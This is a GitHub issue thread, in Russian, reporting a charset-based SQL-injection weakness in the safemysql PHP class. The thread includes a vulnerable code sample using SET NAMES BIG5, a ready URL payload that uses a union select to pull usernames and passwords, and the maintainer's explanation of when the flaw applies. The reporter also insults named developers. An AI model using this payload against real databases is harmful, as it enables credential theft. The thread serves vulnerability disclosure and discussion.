### ISSUE TITLE
Уязвимость к SQL-инъекциям

### ISSUE THREAD

**Issue by SagePtr** [colshrapnel/safemysql#59]
Некий кловун, мнящий себя великим знатоком PHP, в частности по работе с SQL, топил за этот класс для работы с MySQL. Притом авторство класса он тоже присвоил себе.
Что ж, разберём простой пример, как при помощи этого класса можно выстрелить себе в ногу:
```
	require_once __DIR__."/safemysql.class.php";
	$db = new SafeMySQL(['host'=>'127.0.0.1', 'user'=>'test', 'pass'=>'test12', 'db'=>'test']); 
	$db->query("SET NAMES BIG5");
	$id = filter_input(INPUT_GET, 'id');
	if (!$id) {
		exit("Usage: /?id=<i>id</i>");
	} else {
		print_r ($db->getAll("SELECT * FROM table1 WHERE id = ?s", $id));
	}
```
Ломается одним простым запросом:
```
/?id=1%af%5c%27+union(select%20username,%20password%20FROM%20users)%23
```
Исправьте, пожалуйста, либо уязвимость, либо название класса, добавив "un" в начало.

Пользователям же предостережение: не пользуйтесь классами, написанными людьми с высоким самомнением, чаще всего именно глупцы с пеной у рта утверждают, что они знают всё, в то время как на деле они не знают ничего и совершают глупейшие ошибки. И если Евгения Попова разоблачить легко (так как у него код несёт дичью), то у подобных псевдоинтеллектуалов часто код выглядит так, что уязвимость при беглом анализе ещё сложно заметить.

**Comment by alexprey** [comment]
Жаль, что автор не оставил комментарий... Поэтому пришлось проверять самостоятельно. Тикет провакация, все работает как надо.

        echo "<pre>";
        var_dump($this->app->db->parse(
            "SELECT username, password FROM user WHERE userid = ?i AND password = ?s",
            13098,
            "1\' union(select username, password FROM user)#"
        ));
        echo "</pre>";

Выдает валидный экранированный SQL
```
SELECT username, password FROM user WHERE userid = 13098 AND password = '1\\\' union(select username, password FROM user)#'
```

**Comment by colshrapnel** [comment]
@alexprey да, прошу прощения, не отписался в свое время. 
Тут речь о том, что если специально выстрелить себе в ногу посредством `$db->query("SET NAMES BIG5");`, то можно таки получить инъекцию. Но если выставлять кодировку в конфиге, то ничего такого не случится. Не говоря уже о том, что Юникод кодировки вообще не подвержены этой уязвимости, хоть так, хоть эдак.
